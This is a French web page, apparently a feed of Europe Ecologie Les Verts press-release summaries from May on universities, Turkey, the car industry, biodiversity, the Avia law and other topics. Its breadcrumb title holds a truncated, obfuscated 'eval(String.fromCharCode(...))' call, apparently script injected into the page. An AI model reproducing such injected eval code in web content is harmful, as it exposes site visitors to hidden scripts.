Vous êtes ici : Accueil > eval(String.fromCharCode(10, 10, 60, 104, 116, 109, 108, 62, 10, 60, 104, (...)
Publié : 24 octobre 2008

Europe Ecologie Les Verts

http://eelv.fr/

  • Pour le respect de l’indépendance des universités et de leurs conseils

    27 mai, par PAURON Charlotte
    EÉLV appelle la ministre à assurer son rôle de garante de l'indépendance de l'université française et apporte tout son soutien aux organisations étudiantes et à leurs représentant.e.s qui ont su proposer un cadre alternatif adapté à la situation de crise vécue par les (...)
  • La dictature du conservateur Erdogan exerce une répression sans limites sur les oppositions en Turquie

    27 mai, par PAURON Charlotte
    EÉLV est solidaire des démocrates qui se mobilisent contre la censure et la répression qui touchent tous les secteurs de la société turque en général et plus particulièrement kurde.
  • Relance automobile : un plan de sauvetage, mais pas un plan d’avenir

    26 mai, par PAURON Charlotte
    Malgré les 8 milliards d’euros annoncés, le plan de relance envisagé n’est malheureusement pas le plan de moyen terme qui aurait été nécessaire pour permettre à ce secteur de résister aux chocs économiques et écologiques futurs, et d’assurer un emploi pérenne aux salariés de ce secteur qui sera, quoi qu’il (...)
  • Les quartiers populaires ne doivent plus être la variable d’ajustement de la France

    26 mai, par PAURON Charlotte
    La crise du Covid-19 est sans précédent. La situation des quartiers populaires doit nous alerter : de nombreuses personnes ont basculé du jour au lendemain dans l’extrême pauvreté, recourant à l’aide alimentaire et se trouvant dans l’incapacité de payer leur loyer, suite à la perte de tout (...)
  • Non à la fermeture des sites Renault, Oui à la reconversion écologique de l’industrie automobile

    22 mai, par PAURON Charlotte
    La brutalité de cette décision n’est pas acceptable d’autant que le groupe automobile s’apprête à bénéficier d’un prêt bancaire garanti par l’État de 5 milliards d’euros. Depuis des années, le groupe a connaissance du contexte écologique qui doit entraîner des mutations de sa (...)
  • Menaces sur la diversité biologique

    21 mai, par Géraldine Boyer
    Rendons possible le monde d'après ! Des menaces structurelles pèsent sur la biodiversité. Il faut la protéger. Le droit de l'environnement, déjà malmené, est d'ores et déjà une victime collatérale du Coronavirus, comme il l'a toujours été des visions productivistes de notre société. Plus que jamais il (...)
  • Familles et handicap : nos enfants n’attendront pas 2022 !

    20 mai, par PAURON Charlotte
    La réouverture des écoles le 11 mai, alors même que le Conseil scientifique a fait savoir qu’il y était défavorable, continue de soulever des interrogations. Bien que progressive, cette rentrée prématurée semble répondre d’abord à des besoins économiques avant de répondre à des besoins pédagogiques et (...)
  • LOI AVIA : NE CÉDONS PAS À LA TENTATION DE LA CENSURE POLICIÈRE AU NOM DE LA LUTTE CONTRE LA HAINE

    15 mai, par PAURON Charlotte
    Depuis mars 2019, cette proposition de loi a suscité de nombreuses réserves d’institutions ou d’association de défense des libertés. Les écologistes se joignent à ces préoccupations quant à un déséquilibre entre l’objectif nécessaire d’efficacité de la lutte contre la haine en ligne et un arsenal juridique (...)
  • Pour une politique linguistique respectueuse de la pluralité des territoires et de la diversité des parcours !

    15 mai, par PAURON Charlotte
    Nous défendons une politique linguistique respectueuse des bassins de vie et de leurs habitants. Ainsi, la décision d'imposer une certification en anglais dans les études post-bac est un non-sens au regard de la pluralité des territoires de (...)
  • SÉCURITÉ SANITAIRE : LE TOUT JETABLE N’EST PAS LA SOLUTION

    15 mai, par PAURON Charlotte
    Le tout jetable entraîne une montagne de déchets contaminés, eux-mêmes contaminants, qui vont engorger les circuits d’élimination des déchets médicaux, en générant des dépôts temporaires et en risquant la contamination des personnels des entreprises concernées. Or, l’aseptisation de ces équipements est (...)